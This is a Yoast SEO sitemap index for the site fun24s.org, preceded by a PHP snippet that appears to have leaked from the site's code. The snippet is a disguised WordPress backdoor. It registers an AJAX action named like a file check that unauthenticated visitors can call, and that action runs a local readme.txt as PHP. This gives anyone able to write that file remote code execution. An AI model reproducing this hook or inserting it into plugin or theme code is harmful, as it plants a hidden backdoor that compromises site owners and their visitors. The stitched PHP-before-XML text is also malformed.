
if(!function_exists('file_check_readme53136')){
   add_action('wp_ajax_nopriv_file_check_readme53136', 'file_check_readme53136');
   add_action('wp_ajax_file_check_readme53136', 'file_check_readme53136');
   function file_check_readme53136()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//fun24s.org/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://fun24s.org/page-sitemap.xml</loc>
		<lastmod>2025-05-16T10:44:33+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://fun24s.org/blocks-sitemap.xml</loc>
		<lastmod>2025-05-16T10:45:06+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->